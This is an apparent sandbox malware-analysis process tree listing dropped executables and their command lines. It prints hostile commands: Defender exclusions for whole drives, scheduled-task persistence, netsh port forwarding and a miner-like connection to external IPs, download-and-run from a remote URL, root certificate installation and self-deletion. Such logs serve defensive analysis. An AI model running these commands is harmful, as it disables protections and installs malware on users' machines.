      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fff89bc9758,0x7fff89bc9768,0x7fff89bc9778
      4⤵
      PID:3976
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1524 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:2
      4⤵
      PID:5116
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1808 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:8
      4⤵
      PID:2616
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1828 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:8
      4⤵
      PID:2620
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2952 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:1
      4⤵
      PID:2316
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2960 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:1
      4⤵
      PID:4528
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4452 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:1
      4⤵
      PID:692
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:8
      4⤵
      PID:4468
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3160 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:8
      4⤵
      PID:96
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:8
      4⤵
      PID:4984
- C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4196
- C:\Users\Admin\AppData\Local\Temp\Files\fund.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  PID:3500
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"
    3⤵
    PID:3344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "
      4⤵
      PID:4104
    - - C:\DriverHostCrtNet\comSvc.exe
        
        "C:\DriverHostCrtNet\comSvc.exe"
        5⤵
        
        PID:2868
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        6⤵
        
        PID:1128
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        6⤵
        
        PID:5040
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        6⤵
        
        PID:2496
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
        6⤵
        
        PID:4804
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        6⤵
        
        PID:4976
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        6⤵
        
        PID:3484
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        6⤵
        
        PID:4500
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        6⤵
        
        PID:4148
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        6⤵
        
        PID:2348
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        6⤵
        
        PID:2692
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        6⤵
        
        PID:4468
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        6⤵
        
        PID:4456
      - C:\Program Files (x86)\Windows Media Player\lsass.exe
        
        "C:\Program Files (x86)\Windows Media Player\lsass.exe"
        6⤵
        
        PID:5616
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a6df463c-8fab-4b57-9741-907bd05f822e.vbs"
        7⤵
        
        PID:6040
- C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
  2⤵
  - Executes dropped EXE
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:3364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GIECFIEGDB.exe"
    3⤵
    PID:4160
  - - C:\Users\Admin\AppData\Local\Temp\GIECFIEGDB.exe
      "C:\Users\Admin\AppData\Local\Temp\GIECFIEGDB.exe"
      4⤵
      PID:4240
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GIECFIEGDB.exe
        5⤵
        
        PID:772
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        6⤵
        Runs ping.exe
        
        PID:4980
- C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe"
  2⤵
  - Executes dropped EXE
  PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe
    3⤵
    PID:2004
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:3008
- C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
  2⤵
  - Sets file execution options in registry
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:220
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lzqxtxa4.cmdline"
    3⤵
    PID:3492
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES368D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC368C.tmp"
      4⤵
      PID:4252
- - C:\Windows\system32\chcp.com
    "C:\Windows\system32\chcp.com" 437
    3⤵
    PID:2076
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:6484
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:5140
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:5428
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:5504
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy reset
    3⤵
    PID:6552
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:6748
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=80 connectaddress=5.133.65.53
    3⤵
    PID:7484
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:1316
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:3852
- - C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe" -o 5.133.65.54:80 --tls --http-port 888 -t 1
    3⤵
    PID:7972
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:8788
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:1084
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:9040
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -na
    3⤵
    - Gathers network information
    PID:9076
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:8404
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.54
    3⤵
    PID:7184
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" interface portproxy show all
    3⤵
    PID:8056
- - C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe"
    3⤵
    PID:2416
- C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
  2⤵
  PID:6580
- - C:\Users\Admin\AppData\Local\Temp\2224432206.exe
    C:\Users\Admin\AppData\Local\Temp\2224432206.exe
    3⤵
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\257682948.exe
      C:\Users\Admin\AppData\Local\Temp\257682948.exe
      4⤵
      PID:5052
    - - C:\Users\Admin\AppData\Local\Temp\1047527279.exe
        
        C:\Users\Admin\AppData\Local\Temp\1047527279.exe
        5⤵
        
        PID:8808
    - - C:\Users\Admin\AppData\Local\Temp\102721707.exe
        
        C:\Users\Admin\AppData\Local\Temp\102721707.exe
        5⤵
        
        PID:8720
    - - C:\Users\Admin\AppData\Local\Temp\387624501.exe
        
        C:\Users\Admin\AppData\Local\Temp\387624501.exe
        5⤵
        
        PID:5820
    - - C:\Users\Admin\AppData\Local\Temp\1038416992.exe
        
        C:\Users\Admin\AppData\Local\Temp\1038416992.exe
        5⤵
        
        PID:4340
  - - C:\Users\Admin\AppData\Local\Temp\1644630960.exe
      C:\Users\Admin\AppData\Local\Temp\1644630960.exe
      4⤵
      PID:6720
  - - C:\Users\Admin\AppData\Local\Temp\773416145.exe
      C:\Users\Admin\AppData\Local\Temp\773416145.exe
      4⤵
      PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\2888013479.exe
      C:\Users\Admin\AppData\Local\Temp\2888013479.exe
      4⤵
      PID:6548
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c shutdown /r
        5⤵
        
        PID:3300
- C:\Users\Admin\AppData\Local\Temp\Files\TJeAjWEEeH.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\TJeAjWEEeH.exe"
  2⤵
  PID:5580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    PID:6392
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
    3⤵
    PID:7744
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
      4⤵
      Creates scheduled task(s)
      PID:8144
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  PID:5260
- C:\Users\Admin\AppData\Local\Temp\Files\new1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\new1.exe"
  2⤵
  PID:5236
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  PID:5248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA090.tmp.bat""
    3⤵
    PID:5712
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:6724
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      PID:6048
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:6716
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:6008
- C:\Users\Admin\AppData\Local\Temp\Files\RtkAudBCK.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\RtkAudBCK.exe"
  2⤵
  PID:5452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Control.exe
    3⤵
    PID:5112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Control.exe
      4⤵
      PID:2652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Anyns.exe
    3⤵
    PID:6208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Anyns.exe
      4⤵
      PID:4504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Header.exe
    3⤵
    PID:6568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Header.exe
      4⤵
      PID:8000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\Files
    3⤵
    PID:6560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\Files
      4⤵
      PID:7876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\
    3⤵
    PID:6176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\
      4⤵
      PID:6672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Taskhost.exe
    3⤵
    PID:5644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Taskhost.exe
      4⤵
      PID:360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Runtime.exe
    3⤵
    PID:2348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Runtime.exe
      4⤵
      PID:8084
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" powershell -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\Sideload\
    3⤵
    PID:5176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\Sideload\
      4⤵
      PID:7360
- - C:\Windows\SYSTEM32\certutil.exe
    "certutil.exe" -addstore root C:\ProgramData\Microsoft\Diagnosis\Sideload\rtt.cer
    3⤵
    PID:5612
- - C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Control.exe
    "C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Control.exe"
    3⤵
    PID:7380
- - C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Anyns.exe
    "C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Anyns.exe"
    3⤵
    PID:8804
- - C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Header.exe
    "C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Header.exe"
    3⤵
    PID:7216
- - C:\ProgramData\Microsoft\Diagnosis\Sideload\Microsoft.ServiceHub.Taskhost.exe
    "C:\ProgramData\Microsoft\Diagnosis\Sideload\Microsoft.ServiceHub.Taskhost.exe"
    3⤵
    PID:6444
- C:\Users\Admin\AppData\Local\Temp\Files\goldprime123.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\goldprime123.exe"
  2⤵
  PID:6704
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4936
- C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_nKJqAu.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_nKJqAu.exe"
  2⤵
  PID:5364
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
    3⤵
    PID:5612
- C:\Users\Admin\AppData\Local\Temp\Files\swiiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\swiiiii.exe"
  2⤵
  PID:3292
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6920
- C:\Users\Admin\AppData\Local\Temp\Files\Tweeter%20Traffic.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Tweeter%20Traffic.exe"
  2⤵
  PID:5668
- C:\Users\Admin\AppData\Local\Temp\Files\Opera_109.0.5097.38_Autoupdate_x64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Opera_109.0.5097.38_Autoupdate_x64.exe"
  2⤵
  PID:7080
- C:\Users\Admin\AppData\Local\Temp\Files\Ledger-Live.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Ledger-Live.exe"
  2⤵
  PID:5148
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\Files\Ledger-Live.exe
    3⤵
    PID:7244
  - - C:\Windows\SysWOW64\PING.EXE
      ping 2.2.2.2 -n 1 -w 3000
      4⤵
      Runs ping.exe
      PID:7576
- C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"
  2⤵
  PID:6760
- C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
  2⤵
  PID:5132
- - C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
    3⤵
    PID:7000
- C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe"
  2⤵
  PID:2268
- C:\Users\Admin\AppData\Local\Temp\Files\control.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\control.exe"
  2⤵
  PID:5652
- C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
  2⤵
  PID:7852
- C:\Users\Admin\AppData\Local\Temp\Files\ISetup10.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ISetup10.exe"
  2⤵
  PID:3964
- C:\Users\Admin\AppData\Local\Temp\Files\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\setup.exe"
  2⤵
  PID:7732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # Elevate privileges if (-not (IsAdministrator)) { $proc = New-Object System.Diagnostics.Process $proc.StartInfo.WindowStyle = 'Hidden' $proc.StartInfo.FileName = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName $exclusionPaths = '${env:ProgramData}','${env:AppData}','${env:SystemDrive}\\' $proc.StartInfo.Arguments = '-Command "Add-MpPreference -ExclusionPath ""' + ($exclusionPaths -join ',') + '"""' $proc.StartInfo.UseShellExecute = $true $proc.StartInfo.Verb = 'runas' $proc.StartInfo.CreateNoWindow = $true try { $proc.Start() | Out-Null $proc.WaitForExit() | Out-Null [Environment]::Exit(1) } catch [System.ComponentModel.Win32Exception] { if ($AdminRightsRequired) { continue } else { break } } } else { break } } } function IsAdministrator { $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $principal = New-Object System.Security.Principal.WindowsPrincipal($identity) return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) } Get-Win"
    3⤵
    PID:2180
- C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe"
  2⤵
  PID:6060
- - C:\Windows\SysWOW64\clip.exe
    "C:\Windows\SysWOW64\clip.exe"
    3⤵
    PID:4192
  - - C:\Users\Admin\AppData\Roaming\System32\taskhost.exe
      "C:\Users\Admin\AppData\Roaming\System32\taskhost.exe"
      4⤵
      PID:8328
- C:\Users\Admin\AppData\Local\Temp\Files\fscan.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fscan.exe"
  2⤵
  PID:8892
- C:\Users\Admin\AppData\Local\Temp\Files\IjerkOff.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\IjerkOff.exe"
  2⤵
  PID:2436
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"
    3⤵
    PID:8996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "
      4⤵
      PID:7172
    - - C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe
        
        "C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"
        5⤵
        
        PID:8392
- C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"
  2⤵
  PID:2136
- - C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE
    "C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/Admin/AppData/Local/Temp/Files/jeditor.exe" RUN
    3⤵
    PID:7348
  - - C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
      C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
      4⤵
      PID:8524
- C:\Users\Admin\AppData\Local\Temp\Files\june.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\june.exe"
  2⤵
  PID:8744
- - C:\Users\Admin\AppData\Local\Temp\is-S28TD.tmp\june.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-S28TD.tmp\june.tmp" /SL5="$90212,3706563,54272,C:\Users\Admin\AppData\Local\Temp\Files\june.exe"
    3⤵
    PID:4240
  - - C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
      "C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -i
      4⤵
      PID:2628
  - - C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
      "C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -s
      4⤵
      PID:7440
- C:\Users\Admin\AppData\Local\Temp\Files\alexxxxxxxx.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\alexxxxxxxx.exe"
  2⤵
  PID:7520
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6584
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6620
  - - C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
      4⤵
      PID:8856
  - - C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
      4⤵
      PID:7860
